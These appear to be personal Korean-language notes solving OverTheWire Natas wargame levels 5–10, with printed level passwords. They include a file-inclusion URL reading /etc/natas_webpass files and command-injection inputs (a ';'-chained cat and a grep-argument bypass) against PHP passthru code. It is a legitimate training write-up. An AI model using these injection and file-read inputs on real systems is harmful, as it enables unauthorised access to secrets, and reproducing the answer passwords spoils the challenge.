5 -> 6

직접 /includes/secret.inc를 쳐서 들어갔다
왜 아까는 권한이 없다고 안 들어가졌지.?

secret에 FOEIUWGHFEEUHOFUOIU를 입력

bmg8SvU1LizuWjx3y7xkNERkHxGre0GS

6 -> 7

home 클릭

about 클릭

/etc/natas_webpass/natas8 로 들어갔는데 안 된다

링크를http://natas7.natas.labs.overthewire.org/index.php?page=natas8 로 해봤더니

/index.php?page="etc/natas_webpass/natas8" 로 하니

따옴표 "" 떼고 했더니 획득 성공함

xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q

7 -> 8

import binascii
import base64

# Encoded secret from the user
encoded_secret = "3d3d516343746d4d6d6c315669563362"

# Step 1: Convert hex to binary data
binary_data = binascii.unhexlify(encoded_secret)

# Step 2: Reverse the string
reversed_data = binary_data[::-1]

# Step 3: Base64 decode
decoded_secret = base64.b64decode(reversed_data).decode('utf-8')

decoded_secret

oubWYf2kBq

ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

8 -> 9

암호에 있는 단어를검색해야 암호가 출력될 것

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}

; cat /etc/natas_webpass/natas10

t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

9 -> 10

; cat /etc/natas_webpass/natas10을 넣었더니

;만 넣어도 동일한 결과
근데
cat /etc/natas_webpass/natas10을 넣었더니

띄어쓰기 전까지만 인식함

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}

다중명령어를 수행할 수 있는 ; | &을 막아놓음

'[a-z]' /etc/natas_webpass/natas11 넣음

UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk